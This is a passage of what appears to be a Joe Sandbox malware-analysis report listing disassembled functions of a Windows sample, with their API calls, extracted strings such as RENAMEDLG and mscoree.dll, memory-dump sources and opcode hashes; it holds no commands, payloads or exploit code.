                                                                                • Part of subcall function 00D24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D24A33
                                                                              • SetDlgItemTextW.USER32(?,00000066,00D72892), ref: 00D3E036
                                                                              • EndDialog.USER32(?,00000001), ref: 00D3E143
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                              • String ID: %s%s%u
                                                                              • API String ID: 110358324-1360425832
                                                                              • Opcode ID: c4f09dc45e28a3e68e1a061b585ec6cb32f23d8db63554029533f820b91564c0
                                                                              • Instruction ID: ed73cb3541504ac96302295638f28ff3a8381601fde2afea82f55a2ac7dcc59e
                                                                              • Opcode Fuzzy Hash: c4f09dc45e28a3e68e1a061b585ec6cb32f23d8db63554029533f820b91564c0
                                                                              • Instruction Fuzzy Hash: 48419CB1900268AADF25DBA0DC45FEA77BCEB04304F4480A2F909E7191EF719A84CF71
                                                                              Function 00D2CF32 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00D2CF56
                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00D2B505,?,?,00000800,?,?,00D2B4CA,?), ref: 00D2CFF4
                                                                              • _wcslen.LIBCMT ref: 00D2D06A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$CurrentDirectory
                                                                              • String ID: UNC$\\?\
                                                                              • API String ID: 3341907918-253988292
                                                                              • Opcode ID: fb4174287555c4ff1bd10a3a96963371dd941531939ed4ee0e1446ea0d18507e
                                                                              • Instruction ID: 6ff6de4bdf63b1fdba48c2bb93f7711108de8d5be352dce51c8310e6e2d4b1f4
                                                                              • Opcode Fuzzy Hash: fb4174287555c4ff1bd10a3a96963371dd941531939ed4ee0e1446ea0d18507e
                                                                              • Instruction Fuzzy Hash: C141E53540422ABACF21AF20ED01EEE776AEF65399F144025FCA4A3161D770DD96CAB1
                                                                              Function 00D3C8CD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadBitmapW.USER32(00000065), ref: 00D3C8DD
                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00D3C902
                                                                              • DeleteObject.GDI32(00000000), ref: 00D3C934
                                                                              • DeleteObject.GDI32(00000000), ref: 00D3C957
                                                                                • Part of subcall function 00D3B6D2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00D3C92D,00000066), ref: 00D3B6E5
                                                                                • Part of subcall function 00D3B6D2: SizeofResource.KERNEL32(00000000,?,?,?,00D3C92D,00000066), ref: 00D3B6FC
                                                                                • Part of subcall function 00D3B6D2: LoadResource.KERNEL32(00000000,?,?,?,00D3C92D,00000066), ref: 00D3B713
                                                                                • Part of subcall function 00D3B6D2: LockResource.KERNEL32(00000000,?,?,?,00D3C92D,00000066), ref: 00D3B722
                                                                                • Part of subcall function 00D3B6D2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D3C92D,00000066), ref: 00D3B73D
                                                                                • Part of subcall function 00D3B6D2: GlobalLock.KERNEL32(00000000), ref: 00D3B74E
                                                                                • Part of subcall function 00D3B6D2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D3B772
                                                                                • Part of subcall function 00D3B6D2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D3B7B7
                                                                                • Part of subcall function 00D3B6D2: GlobalUnlock.KERNEL32(00000000), ref: 00D3B7D6
                                                                                • Part of subcall function 00D3B6D2: GlobalFree.KERNEL32(00000000), ref: 00D3B7DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                              • String ID: ]
                                                                              • API String ID: 1797374341-3352871620
                                                                              • Opcode ID: 32751d34e38e4d4105f39840a8676623131f02d01155558b1a038d93cd0fd1aa
                                                                              • Instruction ID: c0ded19ac4b9fd988ba57d867e08198fe5172c882974238f267bae070dc45455
                                                                              • Opcode Fuzzy Hash: 32751d34e38e4d4105f39840a8676623131f02d01155558b1a038d93cd0fd1aa
                                                                              • Instruction Fuzzy Hash: 9601223250070667CB113764AC0AB7F7AB9EF81B62F0A0015FA00FB396DF218C059BB0
                                                                              Function 00D3E750 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D212F6: GetDlgItem.USER32(00000000,00003021), ref: 00D2133A
                                                                                • Part of subcall function 00D212F6: SetWindowTextW.USER32(00000000,00D545F4), ref: 00D21350
                                                                              • EndDialog.USER32(?,00000001), ref: 00D3E79B
                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D3E7B1
                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D3E7C5
                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00D3E7D4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ItemText$DialogWindow
                                                                              • String ID: RENAMEDLG
                                                                              • API String ID: 445417207-3299779563
                                                                              • Opcode ID: d41a7df59e940abbd911f46b43ecc16d1c980e9431c612095696cf100e6d88c1
                                                                              • Instruction ID: ee51fda23d9470b1fb87aef113142b15050ed05388375809b3dfcd66a79b10ce
                                                                              • Opcode Fuzzy Hash: d41a7df59e940abbd911f46b43ecc16d1c980e9431c612095696cf100e6d88c1
                                                                              • Instruction Fuzzy Hash: 1D01F776291310BBE2114F78AC4DF677B9DFF59B02F140411F341E61D0C6A2A9098B75
                                                                              Function 00D49235 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D491E6,00000000,?,00D49186,00000000,00D5D570,0000000C,00D492DD,00000000,00000002), ref: 00D49255
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D49268
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00D491E6,00000000,?,00D49186,00000000,00D5D570,0000000C,00D492DD,00000000,00000002), ref: 00D4928B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: e36c14fc7d512e9f2a380368f7ec492052df9b31b6839fd18d804720cfa8e3bf
                                                                              • Instruction ID: a48c36b0725a8944cbbd9afa57640038327948820a8ab1d83821ac8775f3ea7c
                                                                              • Opcode Fuzzy Hash: e36c14fc7d512e9f2a380368f7ec492052df9b31b6839fd18d804720cfa8e3bf
                                                                              • Instruction Fuzzy Hash: E0F0AF30A00318BFCF019BA5EC49B9EBFB4EB04756F500168FD05E22A0DB709E84CAB5
                                                                              Function 00D30627 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D31B56
                                                                                • Part of subcall function 00D31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D3063A,Crypt32.dll,00000000,00D306B4,00000200,?,00D30697,00000000,00000000,?), ref: 00D31B78
                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D30646
                                                                              • GetProcAddress.KERNEL32(00D6A1F0,CryptUnprotectMemory), ref: 00D30656
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                              • API String ID: 2141747552-1753850145
                                                                              • Opcode ID: c8d705d6eee6a0af16e120c0f69166c53db2917918e239c0360fe42901aace41
                                                                              • Instruction ID: 8102e8f0b5553648740431e75a96f4ed400e019f66aed2e0523db0670a5375a3
                                                                              • Opcode Fuzzy Hash: c8d705d6eee6a0af16e120c0f69166c53db2917918e239c0360fe42901aace41
                                                                              • Instruction Fuzzy Hash: 27E08C708047119FDB205F78A959B02BFE49F14B0AF14881DEEDAD3295D6B4D4C88B32
                                                                              Function 00D43D6A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustPointer$_abort
                                                                              • String ID:
                                                                              • API String ID: 2252061734-0
                                                                              • Opcode ID: 75b3dc0e11c06b6f2ca59fa29e81a3c2edcb9afbfc30e4419dea40aff6b60d85
                                                                              • Instruction ID: c36ff99b197086680f505399881037b8dc8eddc64803c72f16b2824b1642b793
                                                                              • Opcode Fuzzy Hash: 75b3dc0e11c06b6f2ca59fa29e81a3c2edcb9afbfc30e4419dea40aff6b60d85
                                                                              • Instruction Fuzzy Hash: 2F51C072A022469FEB299F19D841B7A77A4FF44310F18462DFD4297291E771EE80CBB0
                                                                              Function 00D4D0F0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00D4D0F9
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4D11C
                                                                                • Part of subcall function 00D4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4DBEC,00000000,?,00D480B1,?,00000008,?,00D4A871,?,?,?), ref: 00D4A830
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D4D142
                                                                              • _free.LIBCMT ref: 00D4D155
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4D164
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                              • String ID:
                                                                              • API String ID: 336800556-0
                                                                              • Opcode ID: d244f5e0109a8e77f687d4413b78dc192bd0286ec1be7638b5928234482e4296
                                                                              • Instruction ID: 372c97de39d4ddf3e513d25eca81fe1e6e4242cd8a24c1679798c375c6309d59
                                                                              • Opcode Fuzzy Hash: d244f5e0109a8e77f687d4413b78dc192bd0286ec1be7638b5928234482e4296
                                                                              • Instruction Fuzzy Hash: 18018F726027257F27215ABA6C88C7B7A6EEFC2BA53190129FD08C7301EA648C42C1B1
                                                                              Function 00D4A599 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,00D4A7F0,00D4C348,?,00D4A543,00000001,00000364,?,00D45281,00000050,?,00D63070,00000200), ref: 00D4A59E
                                                                              • _free.LIBCMT ref: 00D4A5D3
                                                                              • _free.LIBCMT ref: 00D4A5FA
                                                                              • SetLastError.KERNEL32(00000000,?,00D63070,00000200), ref: 00D4A607
                                                                              • SetLastError.KERNEL32(00000000,?,00D63070,00000200), ref: 00D4A610
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free
                                                                              • String ID:
                                                                              • API String ID: 3170660625-0
                                                                              • Opcode ID: e902ffac1f4686746794cae4ad9280962def730b9139bb7db33cc08485c56fb2
                                                                              • Instruction ID: ecdc72ffbf564f740aca5196b9fc324144686b0c5b566bea96a3f3cf04f29f15
                                                                              • Opcode Fuzzy Hash: e902ffac1f4686746794cae4ad9280962def730b9139bb7db33cc08485c56fb2
                                                                              • Instruction Fuzzy Hash: 3E012D361C5B00A78212677C6E45D1B256ADBC137233E0018FD09D22C1FF70CD416177
                                                                              Function 00D3220D Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D324EF: ResetEvent.KERNEL32(?), ref: 00D32501
                                                                                • Part of subcall function 00D324EF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D32515
                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D32241
                                                                              • CloseHandle.KERNEL32(?,?), ref: 00D3225B
                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00D32274
                                                                              • CloseHandle.KERNEL32(?), ref: 00D32280
                                                                              • CloseHandle.KERNEL32(?), ref: 00D3228C
                                                                                • Part of subcall function 00D32303: WaitForSingleObject.KERNEL32(?,000000FF,00D32526,?), ref: 00D32309
                                                                                • Part of subcall function 00D32303: GetLastError.KERNEL32(?), ref: 00D32315
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                              • String ID:
                                                                              • API String ID: 1868215902-0
                                                                              • Opcode ID: ef2193b40cfa4cb929d7280fba093d30623c6de3cce7ebc7f28451bd22241642
                                                                              • Instruction ID: 89973a06667fc456e09eb67634f12b97582f6cbe7a0afcfcd9daa9839c0c3424
                                                                              • Opcode Fuzzy Hash: ef2193b40cfa4cb929d7280fba093d30623c6de3cce7ebc7f28451bd22241642
                                                                              • Instruction Fuzzy Hash: 3D012472400700EFC7229F68DC84BC6BBA9FB08711F100929F26B922A0CB757A94CB70
                                                                              Function 00D4D9BF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00D4D9D7
                                                                                • Part of subcall function 00D4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?), ref: 00D4A680
                                                                                • Part of subcall function 00D4A66A: GetLastError.KERNEL32(?,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?,?), ref: 00D4A692
                                                                              • _free.LIBCMT ref: 00D4D9E9
                                                                              • _free.LIBCMT ref: 00D4D9FB
                                                                              • _free.LIBCMT ref: 00D4DA0D
                                                                              • _free.LIBCMT ref: 00D4DA1F
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: f6c4ad7d6e905ac736f7377aea6181138d4eb3878192f7450626f1713cf91825
                                                                              • Instruction ID: 6e5b5f77ef45e5f797d3795ad58c1a1ecdd3f00c04a2d237a35c64de5a2322a0
                                                                              • Opcode Fuzzy Hash: f6c4ad7d6e905ac736f7377aea6181138d4eb3878192f7450626f1713cf91825
                                                                              • Instruction Fuzzy Hash: 44F0BD72554710AB8620EF69F986C5A77EAFB14B107AD0C0AF048D7652CBB1FC908A75
                                                                              Function 00D33338 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00D33340
                                                                              • _wcslen.LIBCMT ref: 00D33351
                                                                              • _wcslen.LIBCMT ref: 00D33361
                                                                              • _wcslen.LIBCMT ref: 00D3336F
                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00D2C844,?,?,00000000,?,?,?), ref: 00D3338A
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$CompareString
                                                                              • String ID:
                                                                              • API String ID: 3397213944-0
                                                                              • Opcode ID: 30c3d7018ca47e8bb64fed5f190338d3e4c9cebb6d641942a5d7593f004585d4
                                                                              • Instruction ID: a35de9f3b86537a24e3809efa1ef17f696cc74b9bc263395ff88d5b5c540df48
                                                                              • Opcode Fuzzy Hash: 30c3d7018ca47e8bb64fed5f190338d3e4c9cebb6d641942a5d7593f004585d4
                                                                              • Instruction Fuzzy Hash: C4F01D32009114BBCF122F55DC09DCE3F26EF94771B258015F6196A061CE32D6A596B0
                                                                              Function 00D49CD0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00D49CEE
                                                                                • Part of subcall function 00D4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?), ref: 00D4A680
                                                                                • Part of subcall function 00D4A66A: GetLastError.KERNEL32(?,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?,?), ref: 00D4A692
                                                                              • _free.LIBCMT ref: 00D49D00
                                                                              • _free.LIBCMT ref: 00D49D13
                                                                              • _free.LIBCMT ref: 00D49D24
                                                                              • _free.LIBCMT ref: 00D49D35
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
